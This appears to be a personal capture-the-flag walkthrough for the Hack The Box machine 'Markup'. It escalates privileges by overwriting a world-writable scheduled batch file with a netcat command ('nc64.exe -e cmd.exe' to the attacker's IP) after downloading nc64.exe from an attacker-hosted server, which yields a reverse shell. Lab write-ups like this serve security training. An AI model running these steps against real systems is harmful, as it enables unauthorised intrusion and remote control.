Last updated
Last updated
#privesc
#check current privileges
daniel@MARKUP C:\Users\daniel> whoami /priv
Privilege Name Description State
============================= ============================== =======
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
* nothing pertinent
daniel@MARKUP C:\Users\daniel> dir c:\
Volume in drive C has no label.
Volume Serial Number is BA76-B4E3
Directory of c:\
03/12/2020 03:56 AM <DIR> Log-Management
07/28/2021 03:38 AM 0 Recovery.txt
* these are the only two UNCOMMON files
- always analyze UNCOMMON files prior to going into a rabbit hole
daniel@MARKUP C:\Users\daniel> type c:\Recovery.txt
blank file
daniel@MARKUP C:\Users\daniel> dir c:\Log-Management
Volume in drive C has no label.
Volume Serial Number is BA76-B4E3
Directory of c:\Log-Management
03/06/2020 02:42 AM 346 job.bat
daniel@MARKUP C:\Users\daniel> type c:\Log-Management\job.bat
@echo off
FOR /F "tokens=1,2*" %%V IN ('bcdedit') DO SET adminTest=%%V
IF (%adminTest%)==(Access) goto noAdmin
for /F "tokens=*" %%G in ('wevtutil.exe el') DO (call :do_clear "%%G")
echo.
echo Event Logs have been cleared!
goto theEnd
:do_clear
wevtutil.exe cl %1
goto :eof
:noAdmin
echo You must run this script as an Administrator!
:theEnd
exit
* understand the purpose of the batch file and what can be manipulated
#view file permission
daniel@MARKUP C:\Users\daniel> icacls c:\Log-Management\job.bat
c:\Log-Management\job.bat BUILTIN\Users:(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
Successfully processed 1 files; Failed processing 0 files
* the wevtutil is used to interact with the Windows Event Log service
- it can retrieve information about event logs and publishers and can
also install and uninstall event manifests, run queries and
export, archive and clear logs
- the el (enumerate logs) parameter lists all event logs currently available
on the system
- the cl (clear log) clears the specified event log.
* the icacls cmd is used to view, modify, back up, and restore NTFS file
and folder permissions (Access Control Lists, or ACLs).
- it’s the modern replacement for older tools like cacls and xcacls.
* the group BUILTIN\Users has full control (F) over the file. The BUILTIN\Users
group represents all local users
- this includes the user Daniel
#use the batch script to execute the transferred netcat IOT execute a reverse shell
daniel@MARKUP C:\Users\daniel>tasklist /V
ERROR: Access denied
daniel@MARKUP C:\Users\daniel>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Users\daniel> get-process
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
31 5 736 2068 1824 1 wevtutil
root@htb:~$ wget https://github.com/rahuldottech/netcat-for-windows/releases/download/1.12/nc64.exe
2025-05-10 21:42:31 (105 MB/s) - ‘nc64.exe’ saved [45272/45272]
root@htb:~$ python3 -m http.server 8081
PS C:\Users\daniel> wget http://10.10.14.215:8081/nc64.exe -OutFile nc64.exe
PS C:\Users\daniel> cmd
daniel@MARKUP C:\Users\daniel> cd c:\Log-Management
daniel@MARKUP c:\Log-Management>copy c:\users\daniel\nc64.exe c:\Log-Management
1 file(s) copied.
daniel@MARKUP C:\Users\daniel> echo C:\Log-Management\nc64.exe -e cmd.exe 10.10.14.215 4321 > C:\Log-Management\job.bat
* DO NOT enclosed the values in quotes!
daniel@MARKUP c:\Log-Management>type job.bat
C:\Log-Management\nc64.exe -e cmd.exe 10.10.14.215 4321
root@htb:~$ nc -nlvp 4321
...
* wait for the script to execute
root@htb:~$ nc...
listening on [any] 4321 ...
connect to [10.10.14.215] from (UNKNOWN) [10.129.24.24] 49686
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.